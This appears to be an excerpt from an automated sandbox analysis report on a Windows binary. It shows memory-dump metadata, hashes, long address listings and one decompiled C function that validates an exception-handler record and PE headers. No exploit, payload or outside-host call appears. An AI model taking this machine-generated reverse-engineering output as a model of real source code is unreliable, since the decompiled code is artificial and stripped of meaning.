                                                                                                                                                                                                                                                            0x0487974b
                                                                                                                                                                                                                                                            0x0487975d
                                                                                                                                                                                                                                                            0x04879760
                                                                                                                                                                                                                                                            0x04879764
                                                                                                                                                                                                                                                            0x04879774
                                                                                                                                                                                                                                                            0x04879777
                                                                                                                                                                                                                                                            0x04879785
                                                                                                                                                                                                                                                            0x04879788
                                                                                                                                                                                                                                                            0x0487979a
                                                                                                                                                                                                                                                            0x0487979d
                                                                                                                                                                                                                                                            0x048797b1
                                                                                                                                                                                                                                                            0x048797b4
                                                                                                                                                                                                                                                            0x048797b6
                                                                                                                                                                                                                                                            0x048797c6
                                                                                                                                                                                                                                                            0x048797c9
                                                                                                                                                                                                                                                            0x048797db
                                                                                                                                                                                                                                                            0x048797de
                                                                                                                                                                                                                                                            0x048797ec
                                                                                                                                                                                                                                                            0x048797ef
                                                                                                                                                                                                                                                            0x04879801
                                                                                                                                                                                                                                                            0x04879804
                                                                                                                                                                                                                                                            0x04879808
                                                                                                                                                                                                                                                            0x04879818
                                                                                                                                                                                                                                                            0x0487981b
                                                                                                                                                                                                                                                            0x0487982d
                                                                                                                                                                                                                                                            0x04879830
                                                                                                                                                                                                                                                            0x0487983e
                                                                                                                                                                                                                                                            0x04879841
                                                                                                                                                                                                                                                            0x04879853
                                                                                                                                                                                                                                                            0x04879856
                                                                                                                                                                                                                                                            0x04879868
                                                                                                                                                                                                                                                            0x0487986b
                                                                                                                                                                                                                                                            0x0487987f
                                                                                                                                                                                                                                                            0x04879882
                                                                                                                                                                                                                                                            0x04879896
                                                                                                                                                                                                                                                            0x04879899
                                                                                                                                                                                                                                                            0x048798ad
                                                                                                                                                                                                                                                            0x048798b0
                                                                                                                                                                                                                                                            0x048798c4
                                                                                                                                                                                                                                                            0x048798c7
                                                                                                                                                                                                                                                            0x048798db
                                                                                                                                                                                                                                                            0x048798de
                                                                                                                                                                                                                                                            0x048798f2
                                                                                                                                                                                                                                                            0x048798f7
                                                                                                                                                                                                                                                            0x04879909
                                                                                                                                                                                                                                                            0x0487990c
                                                                                                                                                                                                                                                            0x04879920
                                                                                                                                                                                                                                                            0x04879923
                                                                                                                                                                                                                                                            0x04879937
                                                                                                                                                                                                                                                            0x0487993a
                                                                                                                                                                                                                                                            0x04879950
                                                                                                                                                                                                                                                            0x04879953
                                                                                                                                                                                                                                                            0x04879967
                                                                                                                                                                                                                                                            0x0487996a
                                                                                                                                                                                                                                                            0x0487997c
                                                                                                                                                                                                                                                            0x0487997f
                                                                                                                                                                                                                                                            0x04879993
                                                                                                                                                                                                                                                            0x04879996
                                                                                                                                                                                                                                                            0x048799aa
                                                                                                                                                                                                                                                            0x048799ad
                                                                                                                                                                                                                                                            0x048799c1
                                                                                                                                                                                                                                                            0x048799ca
                                                                                                                                                                                                                                                            0x048799cd
                                                                                                                                                                                                                                                            0x048799d6
                                                                                                                                                                                                                                                            0x048799df
                                                                                                                                                                                                                                                            0x048799e7
                                                                                                                                                                                                                                                            0x048799ef
                                                                                                                                                                                                                                                            0x048799f9
                                                                                                                                                                                                                                                            0x04879a0e

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                                                                            • Opcode ID: 641cfaae3bd60cfb6f536e607d1dbb929b13bbc7d5e3aa3887d0becdc74c8cf0
                                                                                                                                                                                                                                                            • Instruction ID: 550de78f9f15a35327fee51ea53fe7a78dee849c75033761ab1867fca6018033
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 641cfaae3bd60cfb6f536e607d1dbb929b13bbc7d5e3aa3887d0becdc74c8cf0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E004022C5(long _a4) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                            				short* _v32;
                                                                                                                                                                                                                                                            				void _v36;
                                                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                                            				signed int* _t68;
                                                                                                                                                                                                                                                            				intOrPtr* _t69;
                                                                                                                                                                                                                                                            				intOrPtr* _t71;
                                                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                            				void _t80;
                                                                                                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                                                                                                            				short* _t87;
                                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                                            				signed int* _t90;
                                                                                                                                                                                                                                                            				long _t91;
                                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                                            				signed int _t94;
                                                                                                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                                                                                                            				signed int _t102;
                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                            				long _t108;
                                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t108 = _a4;
                                                                                                                                                                                                                                                            				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                            				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                            				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                            				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                            					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                            					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                            					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                            						_t91 = 0;
                                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                                            						_a4 = 0;
                                                                                                                                                                                                                                                            						_t57 = _t76;
                                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                                            							_t80 =  *_t57;
                                                                                                                                                                                                                                                            							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                            							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                            							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                                            								_t63 = 0;
                                                                                                                                                                                                                                                            								L60:
                                                                                                                                                                                                                                                            								return _t63;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                                            							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                            							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                            								_t12 =  &_a4;
                                                                                                                                                                                                                                                            								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                            								__eflags =  *_t12;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                            							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                            							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                            						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                            						__eflags = _a4;
                                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                            							_t81 =  *0x404178;
                                                                                                                                                                                                                                                            							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                            							_t58 = 0;
                                                                                                                                                                                                                                                            							__eflags = _t81;
                                                                                                                                                                                                                                                            							if(_t81 <= 0) {
                                                                                                                                                                                                                                                            								L18:
                                                                                                                                                                                                                                                            								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                            								__eflags = _t61;
                                                                                                                                                                                                                                                            								if(_t61 < 0) {
                                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									_t62 = _a4;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								__eflags = _t62;
                                                                                                                                                                                                                                                            								if(_t62 == 0) {
                                                                                                                                                                                                                                                            									L59:
                                                                                                                                                                                                                                                            									_t63 = _t104;
                                                                                                                                                                                                                                                            									goto L60;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                            									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                            									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                            										L46:
                                                                                                                                                                                                                                                            										_t63 = 1;
                                                                                                                                                                                                                                                            										 *0x4041c0 = 1;
                                                                                                                                                                                                                                                            										__eflags =  *0x4041c0;
                                                                                                                                                                                                                                                            										if( *0x4041c0 != 0) {
                                                                                                                                                                                                                                                            											goto L60;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										_t84 =  *0x404178;
                                                                                                                                                                                                                                                            										__eflags = _t84;
                                                                                                                                                                                                                                                            										_t93 = _t84;
                                                                                                                                                                                                                                                            										if(_t84 <= 0) {
                                                                                                                                                                                                                                                            											L51:
                                                                                                                                                                                                                                                            											__eflags = _t93;
                                                                                                                                                                                                                                                            											if(_t93 != 0) {
                                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                                            												 *0x4041c0 = 0;
                                                                                                                                                                                                                                                            												goto L5;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											_t77 = 0xf;
                                                                                                                                                                                                                                                            											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                            											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                            												_t77 = _t84;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											_t94 = 0;
                                                                                                                                                                                                                                                            											__eflags = _t77;
                                                                                                                                                                                                                                                            											if(_t77 < 0) {
                                                                                                                                                                                                                                                            												L56:
                                                                                                                                                                                                                                                            												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                            												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                            													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                            													__eflags = _t86;
                                                                                                                                                                                                                                                            													 *0x404178 = _t86;
                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                            												do {
                                                                                                                                                                                                                                                            													_t68 = 0x404180 + _t94 * 4;
                                                                                                                                                                                                                                                            													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                            													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                            													 *_t68 = _t110;
                                                                                                                                                                                                                                                            													_t110 =  *_t68;
                                                                                                                                                                                                                                                            												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                            												goto L56;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										_t69 = 0x40417c + _t84 * 4;
                                                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                                                            											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                            											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                            												goto L51;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                            											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                            											__eflags = _t93;
                                                                                                                                                                                                                                                            											if(_t93 > 0) {
                                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                            											goto L51;
                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                            										goto L51;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t87 = _v32;
                                                                                                                                                                                                                                                            									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                            									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                            									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                            									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                            									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                            									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                            										goto L59;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                            									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                            									if(_t78 < _t72) {
                                                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                            										goto L20;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                            								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                            								if(_t58 < _t81) {
                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                                                                                                            							if(_t58 <= 0) {
                                                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							 *0x4041c0 = 1;
                                                                                                                                                                                                                                                            							__eflags =  *0x4041c0;
                                                                                                                                                                                                                                                            							if( *0x4041c0 != 0) {
                                                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                                            								_t100 = 0;
                                                                                                                                                                                                                                                            								__eflags = _t58;
                                                                                                                                                                                                                                                            								if(_t58 < 0) {
                                                                                                                                                                                                                                                            									L34:
                                                                                                                                                                                                                                                            									 *0x4041c0 = 0;
                                                                                                                                                                                                                                                            									goto L5;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                                            									L33:
                                                                                                                                                                                                                                                            									_t90 = 0x404180 + _t100 * 4;
                                                                                                                                                                                                                                                            									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                            									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                            									 *_t90 = _t110;
                                                                                                                                                                                                                                                            									_t110 =  *_t90;
                                                                                                                                                                                                                                                            								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                            								goto L34;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                                                                                                            							if(_t58 < 0) {
                                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                                            								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                            								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                            									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                            									__eflags = _t81;
                                                                                                                                                                                                                                                            									 *0x404178 = _t81;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                            								L25:
                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                            								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                            								__eflags = _t58;
                                                                                                                                                                                                                                                            								if(_t58 >= 0) {
                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                                                                                                            							if(__eflags >= 0) {
                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                            									goto L34;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                            						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                            						if(_t75 < _v8) {
                                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                            						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                                            					goto L60;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}




































                                                                                                                                                                                                                                                            0x004022cf
                                                                                                                                                                                                                                                            0x004022d2
                                                                                                                                                                                                                                                            0x004022d8
                                                                                                                                                                                                                                                            0x004022f6
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004022f6
                                                                                                                                                                                                                                                            0x004022e0
                                                                                                                                                                                                                                                            0x004022e9
                                                                                                                                                                                                                                                            0x004022ef
                                                                                                                                                                                                                                                            0x004022fe
                                                                                                                                                                                                                                                            0x00402301
                                                                                                                                                                                                                                                            0x00402304
                                                                                                                                                                                                                                                            0x0040230e
                                                                                                                                                                                                                                                            0x0040230e
                                                                                                                                                                                                                                                            0x00402310
                                                                                                                                                                                                                                                            0x00402313
                                                                                                                                                                                                                                                            0x00402315
                                                                                                                                                                                                                                                            0x00402315
                                                                                                                                                                                                                                                            0x00402317
                                                                                                                                                                                                                                                            0x0040231a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040231c
                                                                                                                                                                                                                                                            0x0040231e
                                                                                                                                                                                                                                                            0x00402384
                                                                                                                                                                                                                                                            0x00402384
                                                                                                                                                                                                                                                            0x004024e2
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004024e2
                                                                                                                                                                                                                                                            0x00402320
                                                                                                                                                                                                                                                            0x00402320
                                                                                                                                                                                                                                                            0x00402324
                                                                                                                                                                                                                                                            0x00402326
                                                                                                                                                                                                                                                            0x00402326
                                                                                                                                                                                                                                                            0x00402326
                                                                                                                                                                                                                                                            0x00402326
                                                                                                                                                                                                                                                            0x00402329
                                                                                                                                                                                                                                                            0x0040232a
                                                                                                                                                                                                                                                            0x0040232d
                                                                                                                                                                                                                                                            0x0040232d
                                                                                                                                                                                                                                                            0x00402331
                                                                                                                                                                                                                                                            0x00402335
                                                                                                                                                                                                                                                            0x00402343
                                                                                                                                                                                                                                                            0x00402343
                                                                                                                                                                                                                                                            0x0040234b
                                                                                                                                                                                                                                                            0x00402351
                                                                                                                                                                                                                                                            0x00402353
                                                                                                                                                                                                                                                            0x00402355
                                                                                                                                                                                                                                                            0x00402365
                                                                                                                                                                                                                                                            0x00402372
                                                                                                                                                                                                                                                            0x00402376
                                                                                                                                                                                                                                                            0x0040237b
                                                                                                                                                                                                                                                            0x0040237d
                                                                                                                                                                                                                                                            0x004023fb
                                                                                                                                                                                                                                                            0x004023fb
                                                                                                                                                                                                                                                            0x0040237f
                                                                                                                                                                                                                                                            0x0040237f
                                                                                                                                                                                                                                                            0x0040237f
                                                                                                                                                                                                                                                            0x004023fd
                                                                                                                                                                                                                                                            0x004023ff
                                                                                                                                                                                                                                                            0x004024e0
                                                                                                                                                                                                                                                            0x004024e0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402405
                                                                                                                                                                                                                                                            0x00402405
                                                                                                                                                                                                                                                            0x0040240c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402412
                                                                                                                                                                                                                                                            0x00402416
                                                                                                                                                                                                                                                            0x00402472
                                                                                                                                                                                                                                                            0x00402474
                                                                                                                                                                                                                                                            0x0040247c
                                                                                                                                                                                                                                                            0x0040247e
                                                                                                                                                                                                                                                            0x00402480
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402482
                                                                                                                                                                                                                                                            0x00402488
                                                                                                                                                                                                                                                            0x0040248a
                                                                                                                                                                                                                                                            0x0040248c
                                                                                                                                                                                                                                                            0x004024a1
                                                                                                                                                                                                                                                            0x004024a1
                                                                                                                                                                                                                                                            0x004024a3
                                                                                                                                                                                                                                                            0x004024d2
                                                                                                                                                                                                                                                            0x004024d9
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004024d9
                                                                                                                                                                                                                                                            0x004024a7
                                                                                                                                                                                                                                                            0x004024a8
                                                                                                                                                                                                                                                            0x004024aa
                                                                                                                                                                                                                                                            0x004024ac
                                                                                                                                                                                                                                                            0x004024ac
                                                                                                                                                                                                                                                            0x004024ae
                                                                                                                                                                                                                                                            0x004024b0
                                                                                                                                                                                                                                                            0x004024b2
                                                                                                                                                                                                                                                            0x004024c6
                                                                                                                                                                                                                                                            0x004024c6
                                                                                                                                                                                                                                                            0x004024c9
                                                                                                                                                                                                                                                            0x004024cb
                                                                                                                                                                                                                                                            0x004024cb
                                                                                                                                                                                                                                                            0x004024cc
                                                                                                                                                                                                                                                            0x004024cc
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004024b4
                                                                                                                                                                                                                                                            0x004024b4
                                                                                                                                                                                                                                                            0x004024b4
                                                                                                                                                                                                                                                            0x004024bd
                                                                                                                                                                                                                                                            0x004024be
                                                                                                                                                                                                                                                            0x004024c0
                                                                                                                                                                                                                                                            0x004024c2
                                                                                                                                                                                                                                                            0x004024c2
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004024b4
                                                                                                                                                                                                                                                            0x004024b2
                                                                                                                                                                                                                                                            0x0040248e
                                                                                                                                                                                                                                                            0x00402495
                                                                                                                                                                                                                                                            0x00402495
                                                                                                                                                                                                                                                            0x00402497
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402499
                                                                                                                                                                                                                                                            0x0040249a
                                                                                                                                                                                                                                                            0x0040249d
                                                                                                                                                                                                                                                            0x0040249f
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040249f
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402495
                                                                                                                                                                                                                                                            0x00402418
                                                                                                                                                                                                                                                            0x0040241b
                                                                                                                                                                                                                                                            0x00402420
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402429
                                                                                                                                                                                                                                                            0x0040242b
                                                                                                                                                                                                                                                            0x00402431
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402437
                                                                                                                                                                                                                                                            0x0040243d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402443
                                                                                                                                                                                                                                                            0x00402445
                                                                                                                                                                                                                                                            0x0040244e
                                                                                                                                                                                                                                                            0x00402452
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402458
                                                                                                                                                                                                                                                            0x0040245b
                                                                                                                                                                                                                                                            0x0040245d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402464
                                                                                                                                                                                                                                                            0x00402466
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402468
                                                                                                                                                                                                                                                            0x0040246c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040246c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402357
                                                                                                                                                                                                                                                            0x00402357
                                                                                                                                                                                                                                                            0x00402357
                                                                                                                                                                                                                                                            0x0040235e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402360
                                                                                                                                                                                                                                                            0x00402361
                                                                                                                                                                                                                                                            0x00402363
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402363
                                                                                                                                                                                                                                                            0x0040238b
                                                                                                                                                                                                                                                            0x0040238d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040239d
                                                                                                                                                                                                                                                            0x0040239f
                                                                                                                                                                                                                                                            0x004023a1
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004023a7
